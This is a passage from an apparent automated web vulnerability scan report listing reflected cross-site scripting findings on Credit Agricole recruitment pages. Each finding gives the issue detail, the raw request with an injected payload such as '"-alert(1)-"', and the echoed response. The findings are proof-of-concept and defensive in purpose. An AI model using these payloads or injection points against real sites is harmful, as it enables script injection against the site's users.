Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
dit Agricole Recruitment Group";
var SharingBaseTitle = "Video room - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_video_room.php?3765e"-alert(1)-"e4578547f46=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.120. http://www.mycreditagricole.jobs/stud_vie.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_vie.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 280fc"><a>4ad8248dca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_vie.php?280fc"><a>4ad8248dca=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:55 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:55 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>VIE - S
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_vie.php?280fc"><a>4ad8248dca=1" />
...[SNIP]...

1.121. http://www.mycreditagricole.jobs/stud_vie.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_vie.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61efe"-alert(1)-"9433513db88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_vie.php?61efe"-alert(1)-"9433513db88=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:22 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:22 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>VIE - S
...[SNIP]...
tudents - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "VIE - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_vie.php?61efe"-alert(1)-"9433513db88=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.122. http://www.mycreditagricole.jobs/video_room.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fb8f"-alert(1)-"83c155fc47a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video_room.php?1fb8f"-alert(1)-"83c155fc47a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:32 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:32 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
ideo room - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Video room - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/video_room.php?1fb8f"-alert(1)-"83c155fc47a=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.123. http://www.mycreditagricole.jobs/video_room.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66076"><a>e5b6dfe3ae6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video_room.php?66076"><a>e5b6dfe3ae6=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:13 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:13 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/video_room.php?66076"><a>e5b6dfe3ae6=1" />
...[SNIP]...
